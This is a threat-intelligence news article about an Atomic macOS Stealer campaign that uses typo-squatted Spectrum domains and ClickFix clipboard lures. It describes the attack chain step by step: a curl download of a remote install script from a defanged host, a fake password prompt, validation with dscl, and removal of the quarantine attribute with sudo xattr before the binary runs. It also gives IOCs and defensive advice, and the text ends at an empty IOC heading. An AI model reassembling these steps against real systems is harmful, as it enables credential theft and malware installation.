AMOS macOS Stealer Evades Security to Deploy Malicious Code

A newly uncovered campaign involving an Atomic macOS Stealer (AMOS) variant has emerged, showcasing the evolving sophistication of multi-platform social engineering attacks.

This campaign, discovered during routine attacker infrastructure analysis, leverages typo-squatted domains mimicking Spectrum, a prominent U.S.-based telecommunications provider offering cable television, internet, and managed services.

By employing the Clickfix method, attackers deliver tailored payloads based on the victim’s operating system, with macOS users specifically targeted by a malicious shell script designed to harvest system passwords and deploy an AMOS variant for deeper exploitation.

This operation, marked by Russian-language comments in the source code, points to the likely involvement of Russian-speaking cybercriminals, while its poorly implemented delivery logic reveals a hastily constructed yet dangerous infrastructure.

Deceptive Delivery

The attack begins with victims being lured to typo-squatted domains such as panel-spectrum[.]net and spectrum-ticket[.]net, where they are prompted to click on an “Alternative Verification” option.

This action copies a malicious command to the clipboard, accompanied by platform-specific instructions that often contain inconsistencies such as displaying Windows-specific guidance to macOS users.

For non-macOS user agents, a PowerShell command downloads and executes a script from a command-and-control (C2) server like cf-verifi.pages[.]dev.

However, macOS users receive a Bash command that retrieves a script from applemacios[.]com/getrur/install.sh using curl with silent and redirect-following flags.

According to the CloudSek Report, This script employs native macOS utilities to execute a devastating attack chain: it harvests the victim’s password through a persistent “System Password” prompt, validates it using dscl . -authonly, and stores it in /tmp/.pass.

The script then downloads a malicious binary dubbed “update” (identified by MD5 hash eaedee8fc9fe336bcde021bf243e332a) from applemacios[.]com/getrur/update, bypasses macOS security by using the stolen password with sudo -S xattr -c to remove quarantine attributes, and executes the AMOS variant after making it executable with chmod +x.

This approach, leveraging legitimate tools like sudo and xattr, significantly reduces detection by traditional endpoint security solutions, allowing attackers to steal credentials, gain persistent access, and potentially enable lateral movement within corporate environments for further intrusions like ransomware or data exfiltration.

Defensive Strategies

The implications of this AMOS campaign are severe, particularly for corporate users whose stolen credentials could grant access to VPNs, internal systems, and sensitive resources.

The use of native macOS commands to bypass security mechanisms underscores the challenge of detecting such threats with conventional antivirus or EDR tools.

To mitigate risks, organizations must prioritize user awareness training to recognize deceptive password prompts and system verification tactics.

Hardening macOS endpoints by enforcing system integrity protections and restricting unsigned script execution through Gatekeeper and MDM policies is critical.

Additionally, threat hunting for unusual sudo activity, password prompt abuse, and known AMOS indicators can help identify compromise early.

This campaign highlights the growing trend of cross-platform attacks, urging both consumer and corporate defenders to remain vigilant against socially engineered threats.

Indicators of Compromise (IOCs)